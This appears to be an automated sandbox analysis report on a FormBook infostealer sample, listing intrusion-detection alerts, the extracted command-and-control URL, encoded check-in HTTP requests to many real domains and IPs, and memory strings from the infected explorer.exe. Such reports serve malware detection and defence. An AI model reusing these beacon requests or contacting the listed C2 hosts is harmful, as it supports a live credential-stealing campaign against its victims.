              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 3.33.130.190:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.93.103.39:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49749 -> 104.140.89.24:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 3.33.130.190:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 104.247.81.50:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 37.97.254.27:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 62.72.50.88:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: www.hivaom.top/ao65/
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.leathfortexas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.optimusvisionlb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.maltsky.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.thnkotb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.harmonicod.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.kermisbedrijfkramer.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.stellarskyline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.hivaom.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
              Source: Joe Sandbox ViewASN Name: TEAMINTERNET-CA-ASCA TEAMINTERNET-CA-ASCA
              Source: Joe Sandbox ViewASN Name: PRTL-DE PRTL-DE
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_0330BB50 InternetCheckConnectionA,0_2_0330BB50
              Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: explorer.exe, 00000005.00000000.2331503846.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2331530357.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324920937.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1techtrendzstore.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1techtrendzstore.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.website
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1techtrendzstore.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canwealljustagree.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canwealljustagree.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canwealljustagree.com/ao65/www.ecofare.xyz
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.canwealljustagree.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecofare.xyz
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecofare.xyz/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecofare.xyz/ao65/www.iokgw1.top
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecofare.xyzReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harmonicod.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harmonicod.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harmonicod.com/ao65/www.kermisbedrijfkramer.online
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.harmonicod.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hivaom.top
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hivaom.top/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hivaom.top/ao65/www.canwealljustagree.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hivaom.topReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iokgw1.top
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iokgw1.top/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iokgw1.top/ao65/www.1techtrendzstore.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iokgw1.topReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kermisbedrijfkramer.online
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kermisbedrijfkramer.online/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kermisbedrijfkramer.onlineReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kuis-raja-borong.website
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kuis-raja-borong.website/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kuis-raja-borong.website/ao65/www.oaistetic.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kuis-raja-borong.websiteReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leathfortexas.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leathfortexas.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leathfortexas.com/ao65/www.ouxodb001.cfd
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leathfortexas.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maltsky.net
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maltsky.net/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maltsky.net/ao65/www.thnkotb.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maltsky.netReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oaistetic.com
              Source: explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oaistetic.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oaistetic.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.optimusvisionlb.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.optimusvisionlb.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.optimusvisionlb.com/ao65/www.maltsky.net
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.optimusvisionlb.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ouxodb001.cfd
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ouxodb001.cfd/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ouxodb001.cfdReferer:
              Source: Fpopgapwdcgvxn.exe, Fpopgapwdcgvxn.exe, 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2322773738.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000002.2582481668.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2688350100.00000000029C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sprockettrucking.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sprockettrucking.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sprockettrucking.com/ao65/www.leathfortexas.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sprockettrucking.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stellarskyline.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stellarskyline.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stellarskyline.com/ao65/www.hivaom.top
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stellarskyline.comReferer:
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thnkotb.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thnkotb.com/ao65/
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thnkotb.com/ao65/www.harmonicod.com
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thnkotb.comReferer:
              Source: explorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
              Source: explorer.exe, 00000005.00000000.2345200413.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4629484500.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
              Source: explorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
              Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/(
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/?
              Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/E
